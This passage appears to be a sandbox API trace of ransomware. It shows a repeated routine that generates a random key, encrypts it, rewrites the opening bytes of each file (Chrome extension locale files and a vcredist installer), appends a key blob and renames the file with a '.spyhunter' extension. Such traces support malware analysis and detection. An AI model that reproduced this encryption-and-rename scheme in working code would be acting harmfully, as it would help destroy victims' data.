"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0134.094] GetProcessHeap () returned 0x2c0000 [0134.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.094] GetProcessHeap () returned 0x2c0000 [0134.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0134.094] GetProcessHeap () returned 0x2c0000 [0134.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e948 | out: hHeap=0x2c0000) returned 1 [0134.190] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf508 | out: pbBuffer=0x25cf508) returned 1 [0134.190] GetProcessHeap () returned 0x2c0000 [0134.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.190] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf500*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf500*=0x30) returned 1 [0134.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.190] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0134.190] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.190] GetProcessHeap () returned 0x2c0000 [0134.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.190] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf4c4*=0x123, lpOverlapped=0x0) returned 1 [0134.191] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffedd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.191] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x123, lpNumberOfBytesWritten=0x25cf4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf4c4*=0x123, lpOverlapped=0x0) returned 1 [0134.191] GetProcessHeap () returned 0x2c0000 [0134.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.191] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.191] WriteFile (in: hFile=0x184, lpBuffer=0x25cf504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf504*, lpNumberOfBytesWritten=0x25cf4c4*=0x4, lpOverlapped=0x0) returned 1 [0134.191] WriteFile (in: hFile=0x184, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf4c4*=0x30, lpOverlapped=0x0) returned 1 [0134.192] CloseHandle (hObject=0x184) returned 1 [0134.192] GetProcessHeap () returned 0x2c0000 [0134.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.192] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.spyhunter") returned 165 [0134.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0134.192] GetProcessHeap () returned 0x2c0000 [0134.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.192] GetProcessHeap () returned 0x2c0000 [0134.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.192] GetProcessHeap () returned 0x2c0000 [0134.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31dff0 | out: hHeap=0x2c0000) returned 1 [0134.193] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf500 | out: pbBuffer=0x25cf500) returned 1 [0134.193] GetProcessHeap () returned 0x2c0000 [0134.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.193] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4f8*=0x30) returned 1 [0134.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.194] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json") returned 155 [0134.194] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.194] GetProcessHeap () returned 0x2c0000 [0134.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.194] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf4bc*=0xe1, lpOverlapped=0x0) returned 1 [0134.195] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.195] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x25cf4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf4bc*=0xe1, lpOverlapped=0x0) returned 1 [0134.195] GetProcessHeap () returned 0x2c0000 [0134.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.195] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.195] WriteFile (in: hFile=0x184, lpBuffer=0x25cf4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf4fc*, lpNumberOfBytesWritten=0x25cf4bc*=0x4, lpOverlapped=0x0) returned 1 [0134.195] WriteFile (in: hFile=0x184, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf4bc*=0x30, lpOverlapped=0x0) returned 1 [0134.195] CloseHandle (hObject=0x184) returned 1 [0134.195] GetProcessHeap () returned 0x2c0000 [0134.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.195] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.spyhunter") returned 165 [0134.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\messages.json.spyhunter")) returned 1 [0134.196] GetProcessHeap () returned 0x2c0000 [0134.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.196] GetProcessHeap () returned 0x2c0000 [0134.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.196] GetProcessHeap () returned 0x2c0000 [0134.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e180a0 | out: hHeap=0x2c0000) returned 1 [0134.197] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4f8 | out: pbBuffer=0x25cf4f8) returned 1 [0134.197] GetProcessHeap () returned 0x2c0000 [0134.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4f0*=0x30) returned 1 [0134.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0134.198] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.198] GetProcessHeap () returned 0x2c0000 [0134.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.198] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf4b4*=0xde, lpOverlapped=0x0) returned 1 [0134.198] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.198] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x25cf4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf4b4*=0xde, lpOverlapped=0x0) returned 1 [0134.199] GetProcessHeap () returned 0x2c0000 [0134.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.199] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.199] WriteFile (in: hFile=0x184, lpBuffer=0x25cf4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf4f4*, lpNumberOfBytesWritten=0x25cf4b4*=0x4, lpOverlapped=0x0) returned 1 [0134.199] WriteFile (in: hFile=0x184, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf4b4*=0x30, lpOverlapped=0x0) returned 1 [0134.199] CloseHandle (hObject=0x184) returned 1 [0134.199] GetProcessHeap () returned 0x2c0000 [0134.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.199] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.spyhunter") returned 165 [0134.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0134.200] GetProcessHeap () returned 0x2c0000 [0134.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.200] GetProcessHeap () returned 0x2c0000 [0134.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.200] GetProcessHeap () returned 0x2c0000 [0134.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17d98 | out: hHeap=0x2c0000) returned 1 [0134.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4f0 | out: pbBuffer=0x25cf4f0) returned 1 [0134.201] GetProcessHeap () returned 0x2c0000 [0134.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4e8*=0x30) returned 1 [0134.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0134.202] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.202] GetProcessHeap () returned 0x2c0000 [0134.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.202] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf4ac*=0xe0, lpOverlapped=0x0) returned 1 [0134.203] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.203] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x25cf4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf4ac*=0xe0, lpOverlapped=0x0) returned 1 [0134.203] GetProcessHeap () returned 0x2c0000 [0134.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.203] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.203] WriteFile (in: hFile=0x184, lpBuffer=0x25cf4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf4ec*, lpNumberOfBytesWritten=0x25cf4ac*=0x4, lpOverlapped=0x0) returned 1 [0134.203] WriteFile (in: hFile=0x184, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf4ac*=0x30, lpOverlapped=0x0) returned 1 [0134.204] CloseHandle (hObject=0x184) returned 1 [0134.204] GetProcessHeap () returned 0x2c0000 [0134.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.204] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.spyhunter") returned 166 [0134.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0134.204] GetProcessHeap () returned 0x2c0000 [0134.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.205] GetProcessHeap () returned 0x2c0000 [0134.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.205] GetProcessHeap () returned 0x2c0000 [0134.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0134.205] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4e8 | out: pbBuffer=0x25cf4e8) returned 1 [0134.205] GetProcessHeap () returned 0x2c0000 [0134.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.205] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4e0*=0x30) returned 1 [0134.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0134.205] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0134.205] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".txt") returned 0x0 [0134.205] GetProcessHeap () returned 0x2c0000 [0134.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0134.205] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf4a4*=0x2800, lpOverlapped=0x0) returned 1 [0134.324] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.324] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf4a4*=0x2800, lpOverlapped=0x0) returned 1 [0134.325] GetProcessHeap () returned 0x2c0000 [0134.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0134.325] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.325] WriteFile (in: hFile=0x184, lpBuffer=0x25cf4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf4a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf4e4*, lpNumberOfBytesWritten=0x25cf4a4*=0x4, lpOverlapped=0x0) returned 1 [0134.381] WriteFile (in: hFile=0x184, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf4a4*=0x30, lpOverlapped=0x0) returned 1 [0134.381] CloseHandle (hObject=0x184) returned 1 [0134.520] GetProcessHeap () returned 0x2c0000 [0134.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0134.520] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.spyhunter") returned 98 [0134.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.spyhunter" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.spyhunter")) returned 1 [0134.521] GetProcessHeap () returned 0x2c0000 [0134.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0134.521] GetProcessHeap () returned 0x2c0000 [0134.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.521] GetProcessHeap () returned 0x2c0000 [0134.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44728 | out: hHeap=0x2c0000) returned 1 [0134.533] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4e0 | out: pbBuffer=0x25cf4e0) returned 1 [0134.533] GetProcessHeap () returned 0x2c0000 [0134.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.533] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4d8*=0x30) returned 1 [0134.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 